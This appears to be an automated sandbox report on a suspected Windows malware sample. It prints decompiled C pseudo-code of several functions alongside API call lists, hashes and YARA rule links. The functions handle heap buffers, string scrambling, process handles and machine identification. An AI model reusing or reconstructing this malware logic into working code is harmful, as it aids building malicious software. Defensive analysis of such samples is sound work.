                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                • String ID: <
                                • API String ID: 593937197-4251816714
                                • Opcode ID: 927b4335cd23efec4eb578a2c4bed4dd36515f684a0d89a2fb7f0169e08eda71
                                • Instruction ID: 842b60369ca60cd37b4f4ba6d0571fe979516c0db451616468ecf56cf8dbf254
                                • Opcode Fuzzy Hash: 927b4335cd23efec4eb578a2c4bed4dd36515f684a0d89a2fb7f0169e08eda71
                                • Instruction Fuzzy Hash: 6F11FAB1A00218ABDF00DFA6D885BD97BF8EB08394F04841AF919E7240D774ED44CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 041939C5, Relevance: 7.7, APIs: 6, Instructions: 163COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.NTDLL(04194A23,041970D9,00000010,?,?,?,04194A23,00000001,041970D9,00000000,?,041962B1,00000000,041970D9,?,00000000), ref: 04193A16
                                • memcpy.NTDLL(00000000,00000000,00000000,00000010), ref: 04193AA9
                                • GetLastError.KERNEL32(?,?,00000010), ref: 04193B01
                                • GetLastError.KERNEL32 ref: 04193B33
                                • GetLastError.KERNEL32 ref: 04193B47
                                • GetLastError.KERNEL32(?,?,?,04194A23,00000001,041970D9,00000000,?,041962B1,00000000,041970D9,?,00000000,041970D9,00000000,00000000), ref: 04193B5C
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorLast$memcpy
                                • String ID:
                                • API String ID: 2760375183-0
                                • Opcode ID: 14086f76e32c02640120480da1a342903c49addaf14f3ecf490ac0ede4fcf8fd
                                • Instruction ID: 92ed93b42d4dc210c7713e65b40564f4d5b035061984359374f4ec9502f1f3e0
                                • Opcode Fuzzy Hash: 14086f76e32c02640120480da1a342903c49addaf14f3ecf490ac0ede4fcf8fd
                                • Instruction Fuzzy Hash: 1D514DB190024CFFDF109FA5DC84AAEBBF9EB08340F048465F925E6240D735AE54DB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04192A23, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 22%
                                			E04192A23(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E04196837(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E041950CA(_v16);
								goto L37;
							}
							_t103 = E04196837((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x419a2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                0x04192a2a
                                0x04192a31
                                0x04192a36
                                0x04192a39
                                0x04192a40
                                0x04192a43
                                0x04192a46
                                0x04192a4d
                                0x04192a50
                                0x04192ba4
                                0x04192ba6
                                0x04192ba8
                                0x04192bad
                                0x04192bad
                                0x04192a56
                                0x04192a59
                                0x04192a5c
                                0x04192a5e
                                0x04192a5e
                                0x04192a62
                                0x00000000
                                0x00000000
                                0x04192a66
                                0x04192a92
                                0x04192a97
                                0x04192a99
                                0x04192a99
                                0x04192a9c
                                0x04192a9f
                                0x04192a9f
                                0x04192aa1
                                0x00000000
                                0x04192a6c
                                0x04192a6e
                                0x04192a8d
                                0x04192a8d
                                0x04192aa4
                                0x04192aa4
                                0x04192aa5
                                0x04192aa5
                                0x04192aa8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04192aa8
                                0x04192a72
                                0x04192ab9
                                0x04192abd
                                0x04192b97
                                0x04192b99
                                0x04192b99
                                0x04192b9a
                                0x04192b9d
                                0x00000000
                                0x04192b9d
                                0x04192ad7
                                0x04192adb
                                0x04192b93
                                0x00000000
                                0x04192b93
                                0x04192ae1
                                0x04192ae4
                                0x04192ae8
                                0x04192aee
                                0x04192af1
                                0x04192b89
                                0x04192b89
                                0x00000000
                                0x04192b8f
                                0x04192afc
                                0x04192b05
                                0x04192b19
                                0x04192b20
                                0x04192b35
                                0x04192b3b
                                0x04192b43
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04192b45
                                0x04192b45
                                0x04192b45
                                0x04192b4c
                                0x04192b54
                                0x00000000
                                0x00000000
                                0x04192b56
                                0x04192b5f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04192b61
                                0x04192b63
                                0x04192b66
                                0x04192b66
                                0x04192b69
                                0x04192b6d
                                0x04192b70
                                0x04192b76
                                0x04192b79
                                0x04192b80
                                0x00000000
                                0x04192afc
                                0x04192a77
                                0x04192a82
                                0x04192a85
                                0x04192a87
                                0x04192a87
                                0x04192a8a
                                0x04192a8c
                                0x00000000
                                0x04192a8c
                                0x04192a66
                                0x04192aac
                                0x04192ab1
                                0x04192ab3
                                0x04192ab3
                                0x04192ab6
                                0x04192ab6
                                0x00000000

                                APIs
                                  • Part of subcall function 04196837: RtlAllocateHeap.NTDLL(00000000,00000000,04194197), ref: 04196843
                                • lstrcpy.KERNEL32(00000001,00000020), ref: 04192B20
                                • lstrcat.KERNEL32(00000001,00000020), ref: 04192B35
                                • lstrcmp.KERNEL32(00000000,00000001), ref: 04192B4C
                                • lstrlen.KERNEL32(00000001), ref: 04192B70
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: 87a16de494389fc1c4fd805f0063a4410b69f27e6cc24a99fade8de299456e28
                                • Instruction ID: 2355a2c0de766b776b72f3910bd85f7e0437680c7feab327ac96038a18bf9ea2
                                • Opcode Fuzzy Hash: 87a16de494389fc1c4fd805f0063a4410b69f27e6cc24a99fade8de299456e28
                                • Instruction Fuzzy Hash: A8517B76A00208FBDF25CF99C584AADBBF6EF45314F15889AE8199B201C770AE41CB84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0419624D, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 68stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 55%
                                			E0419624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				void* _t42;
				void* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x419a2d4; // 0x0
				_t1 = _t9 + 0x419b60c; // 0x63dcc828
				_t36 = 0;
				_t28 = E0419278C(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x1
					_t40 = E04196837(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t36 = E041949FE(_t33, _t34, _t40, _a8);
						E041950CA(_t40);
						_t42 = E04197565( *0x419a10c(_t36, "="), _t36);
						if(_t42 != 0) {
							E041950CA(_t36);
							_t36 = _t42;
						}
						_t43 = E041952E5(_t36, _t33);
						if(_t43 != 0) {
							E041950CA(_t36);
							_t36 = _t43;
						}
					}
					E041950CA(_t28);
				}
				return _t36;
			}















                                0x0419624d
                                0x04196250
                                0x04196251
                                0x04196258
                                0x0419625f
                                0x04196266
                                0x0419626a
                                0x04196271
                                0x04196278
                                0x0419627d
                                0x04196285
                                0x0419628f
                                0x04196293
                                0x04196297
                                0x0419629d
                                0x041962a2
                                0x041962b2
                                0x041962b4
                                0x041962cb
                                0x041962cf
                                0x041962d2
                                0x041962d7
                                0x041962d7
                                0x041962e0
                                0x041962e4
                                0x041962e7
                                0x041962ec
                                0x041962ec
                                0x041962e4
                                0x041962ef
                                0x041962f4
                                0x041962fa

                                APIs
                                  • Part of subcall function 0419278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04196266,63DCC828,00000000,00000000,?,00000000,041970D9), ref: 041927F3
                                  • Part of subcall function 0419278C: sprintf.NTDLL ref: 04192814
                                • lstrlen.KERNEL32(00000000,00000000,63DCC828,00000000,00000000,?,00000000,041970D9,00000000,00000000), ref: 04196278
                                • lstrlen.KERNEL32(00000000,?,00000000,041970D9,00000000,00000000), ref: 04196280
                                  • Part of subcall function 04196837: RtlAllocateHeap.NTDLL(00000000,00000000,04194197), ref: 04196843
                                • strcpy.NTDLL ref: 04196297
                                • lstrcat.KERNEL32(00000000,00000000), ref: 041962A2
                                  • Part of subcall function 041949FE: lstrlen.KERNEL32(00000000,00000000,041970D9,00000000,?,041962B1,00000000,041970D9,?,00000000,041970D9,00000000,00000000), ref: 04194A0F
                                  • Part of subcall function 041950CA: HeapFree.KERNEL32(00000000,00000000,04194239,00000000,00000001,?,00000000,?,?,?,04196B8D,00000000,?,00000001), ref: 041950D6
                                  • Part of subcall function 04197565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,041962CB,00000000,?,00000000,041970D9,00000000,00000000), ref: 0419756F
                                  • Part of subcall function 04197565: _snprintf.NTDLL ref: 041975CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFree_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 3759146525-1428090586
                                • Opcode ID: b94767f5495708f21770d4339dbc024b315211b6278897b9f9ed2abab0769252
                                • Instruction ID: 4d67d1eeae3caa63fa8f25c68b3318482e0b04f9a215e0fe92cc1e2540b438bf
                                • Opcode Fuzzy Hash: b94767f5495708f21770d4339dbc024b315211b6278897b9f9ed2abab0769252
                                • Instruction Fuzzy Hash: 24117073901225779F166BA99CC4C6E37EEAF496583094069F904A7200DF79FD0297E1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04194C1B, Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04194C1B(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x419a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x419a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x419a2b0 = _t6;
				 *0x419a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x419a2ac = _t7;
				if(_t7 == 0) {
					 *0x419a2ac =  *0x419a2ac | 0xffffffff;
				}
				return 0;
			}








                                0x04194c23
                                0x04194c2b
                                0x04194c30
                                0x00000000
                                0x04194c7d
                                0x04194c32
                                0x04194c3a
                                0x04194c7a
                                0x00000000
                                0x04194c7a
                                0x04194c3c
                                0x04194c41
                                0x04194c53
                                0x04194c58
                                0x04194c5e
                                0x04194c66
                                0x04194c6b
                                0x04194c6d
                                0x04194c6d
                                0x00000000

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04196B4E,?,?,00000001), ref: 04194C23
                                • GetVersion.KERNEL32(?,00000001), ref: 04194C32
                                • GetCurrentProcessId.KERNEL32(?,00000001), ref: 04194C41
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 04194C5E
                                • GetLastError.KERNEL32(?,00000001), ref: 04194C7D
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 3f2bd17d5bed21b5b53f36641d1a4e4f9244e5c8f801b385384300ddea7a0afe
                                • Instruction ID: 508744075783cc5bf8984b676678f8ef951faf219b5aacb81c7f79f6c75b8864
                                • Opcode Fuzzy Hash: 3f2bd17d5bed21b5b53f36641d1a4e4f9244e5c8f801b385384300ddea7a0afe
                                • Instruction Fuzzy Hash: 45F090B0758341AFEB288F67A84AB153BB8EB04780F04421DE116C52C0DF7A5C85CF15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 041953F2, Relevance: 6.2, APIs: 4, Instructions: 191memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 51%
                                			E041953F2(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				long _t42;
				long _t48;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr* _t70;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				long _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E041958F8();
				if(_t27 != 0) {
					_t77 =  *0x419a2b4; // 0x42ee000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x419a2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x419a148(0, 2);
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E0419696F( &_v8,  &_v16);
					_push(0);
					_t84 = _t31;
					_t32 =  *0x419a2d4; // 0x0
					_push(0x419a2fc);
					_push(1);
					_t7 = _t32 + 0x419b5ad; // 0x8b330082
					 *0x419a2f8 = 0xc;
					 *0x419a300 = 0;
					L04194AF8();
					if(E04196384(_t79,  &_v24,  &_v12) == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						_t70 =  *0x419a134; // 0x4197909
						if(_t37 != 0) {
							E04194454(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E04196837(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x419a2d4; // 0x0
								_t18 = _t64 + 0x419b84f; // 0x771c5467
								 *_t70(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x419a32c = _t87;
						}
						_t38 = E041960E1();
						 *0x419a2c8 =  *0x419a2c8 ^ 0xe8fa7dd7;
						 *0x419a31c = _t38;
						_t39 = E04196837(0x60);
						__eflags = _t39;
						 *0x419a37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x419a37c; // 0x0
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x419a37c; // 0x0
							 *_t56 = 0x419b83e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x419a290, _t84, 0x43);
							__eflags = _t42;
							 *0x419a314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x419a2b4; // 0x42ee000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x419a2d4; // 0x0
								_t19 = _t76 + 0x419b53a; // 0x66e03591
								_t73 = _t19;
								 *_t70(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x41992a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E04194454( ~_v8 &  *0x419a2c8, 0x419a00c);
								_t84 = E04192206(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E04191376();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t84 = E04192022(_t79, _t82, _v8);
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E04192439(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x419a14c();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E04196BE1(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}





































                                0x041953f2
                                0x041953fd
                                0x04195400
                                0x04195403
                                0x04195406
                                0x0419540d
                                0x0419540f
                                0x0419541b
                                0x0419541d
                                0x0419541d
                                0x04195426
                                0x0419542e
                                0x04195431
                                0x0419544b
                                0x04195450
                                0x04195451
                                0x04195453
                                0x04195458
                                0x0419545d
                                0x0419545f
                                0x04195466
                                0x04195470
                                0x04195476
                                0x0419548a
                                0x0419548f
                                0x0419548f
                                0x04195498
                                0x041954c1
                                0x041954c4
                                0x041954c6
                                0x041954d1
                                0x041954d8
                                0x041954e4
                                0x041954e6
                                0x041954e8
                                0x041954ed
                                0x041954f3
                                0x041954f9
                                0x041954ff
                                0x04195502
                                0x04195507
                                0x0419550f
                                0x04195511
                                0x04195511
                                0x04195514
                                0x04195514
                                0x0419551a
                                0x0419551f
                                0x04195527
                                0x0419552c
                                0x04195531
                                0x04195533
                                0x04195538
                                0x04195567
                                0x0419553a
                                0x0419553f
                                0x04195544
                                0x04195549
                                0x04195550
                                0x04195556
                                0x0419555b
                                0x04195561
                                0x04195561
                                0x04195568
                                0x0419556a
                                0x04195579
                                0x0419557f
                                0x04195581
                                0x04195586
                                0x041955b2
                                0x04195588
                                0x04195588
                                0x0419558e
                                0x0419559b
                                0x041955a1
                                0x041955a1
                                0x041955a9
                                0x041955ab
                                0x041955b3
                                0x041955b5
                                0x041955bc
                                0x041955c9
                                0x041955d3
                                0x041955d5
                                0x041955d7
                                0x00000000
                                0x00000000
                                0x041955d9
                                0x041955de
                                0x041955e0
                                0x041955e7
                                0x041955eb
                                0x041955ee
                                0x04195603
                                0x0419560c
                                0x00000000
                                0x0419560c
                                0x041955f0
                                0x041955f2
                                0x00000000
                                0x00000000
                                0x041955f4
                                0x041955fd
                                0x041955ff
                                0x04195601
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04195601
                                0x041955e4
                                0x041955e4
                                0x041955b5
                                0x0419549a
                                0x0419549a
                                0x0419549f
                                0x0419560e
                                0x04195612
                                0x0419561a
                                0x0419561a
                                0x00000000
                                0x04195612
                                0x041954a5
                                0x041954a8
                                0x041954a8
                                0x041954aa
                                0x041954ad
                                0x041954b5
                                0x041954bc
                                0x00000000
                                0x04195622
                                0x04195622
                                0x04195625
                                0x0419562a
                                0x0419562a

                                APIs
                                  • Part of subcall function 041958F8: GetModuleHandleA.KERNEL32(E66068DB,00000000,0419540B,00000000,00000000,00000000,?,?,?,?,?,04196BD8,?,00000001), ref: 04195907
                                • CloseHandle.KERNEL32(?,?,00000001,8B330082,00000001,0419A2FC,00000000,?,?,?,?,?,?,?,04196BD8), ref: 0419548F
                                • memset.NTDLL ref: 0419553F
                                • RtlInitializeCriticalSection.NTDLL(-00000040), ref: 04195550
                                • RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 04195579
                                  • Part of subcall function 04194454: RtlAllocateHeap.NTDLL(00000000,041955CE), ref: 041944A2
                                  • Part of subcall function 04194454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,041955CE,?,?,?,?,?,04196BD8,?,00000001), ref: 041944D0
                                  • Part of subcall function 04194454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 041944F7
                                  • Part of subcall function 04194454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0419450B
                                  • Part of subcall function 04194454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 04194518
                                  • Part of subcall function 04194454: HeapFree.KERNEL32(00000000,00000000), ref: 04194536
                                  • Part of subcall function 04196837: RtlAllocateHeap.NTDLL(00000000,00000000,04194197), ref: 04196843
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$Allocate$ComputerFreeHandleName$CloseCriticalInitializeModuleSectionmemset
                                • String ID:
                                • API String ID: 705796739-0
                                • Opcode ID: 296855697d0cac36c022b2ebcb5d0ea695748809c03a81b008f73ab22a3be9b0
                                • Instruction ID: ad7448ac5dcb5fff5f9183cf2ebcc3e0155e4d9fd036d0ef82c378a1a99f65ee
                                • Opcode Fuzzy Hash: 296855697d0cac36c022b2ebcb5d0ea695748809c03a81b008f73ab22a3be9b0
                                • Instruction Fuzzy Hash: 2051B572A40215BBEF16DB66D9C4A6E77FAEF04794F150055E804F7240EB78FD848BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04191D57, Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 167stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 79%
                                			E04191D57(void* __ecx, intOrPtr _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				intOrPtr _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x419a38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E04194AA6( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E04197702(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E041950CA(_a8);
						goto L29;
					}
					_t64 =  *0x419a2cc; // 0x0
					_t65 = E04194AA6(_t64,  *((intOrPtr*)(_t64 + 0xc)));
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d041990
						if(E04195F2A(_t97,  *_t33, _t91, _a8,  *0x419a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x419a2d4; // 0x0
							if(_t98 == 0) {
								_t35 = _t68 + 0x419b9e0; // 0x702e7eb2
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x419b9db; // 0x45464f23
								_t69 = _t34;
							}
							if(E04195927(_t69,  *0x419a384,  *0x419a388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x419a2d4; // 0x0
									_t44 = _t71 + 0x419b86a; // 0xa453651
									_t73 = E04194AA6(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d041990
										E04191F7A( *_t47, _t91, _a8,  *0x419a388, _a24);
										_t49 = _t101 + 0x10; // 0x3d041990
										E04191F7A( *_t49, _t91, _t99,  *0x419a380, _a16);
										E041950CA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d041990
									E04191F7A( *_t40, _t91, _a8,  *0x419a388, _a24);
									_t43 = _t101 + 0x10; // 0x3d041990
									E04191F7A( *_t43, _t91, _a8,  *0x419a380, _a16);
								}
								if( *_t101 != 0) {
									E041950CA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d041990
					_t81 = E04196A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d041990
							E04195F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E041950CA(_t100);
						_t98 = _a16;
					}
					E041950CA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104) {
					goto L29;
				} else {
					_push(0x5f);
					_push(_a8);
					if( *0x419a110() != 0) {
						goto L29;
					} else {
						_t97 = _a8;
						E041977A4(_t98, _a8,  &_v284);
						__imp__(_t102 + _t98 - 0x117,  *0x419a38c);
						 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
						_t91 = 0x80000003;
						goto L6;
					}
				}
			}























                                0x04191d57
                                0x04191d60
                                0x04191d67
                                0x04191d6c
                                0x04191dd9
                                0x04191ddf
                                0x04191de4
                                0x04191deb
                                0x04191df2
                                0x04191df5
                                0x04191f60
                                0x04191f67
                                0x04191f67
                                0x04191f6c
                                0x04191f6e
                                0x04191f6e
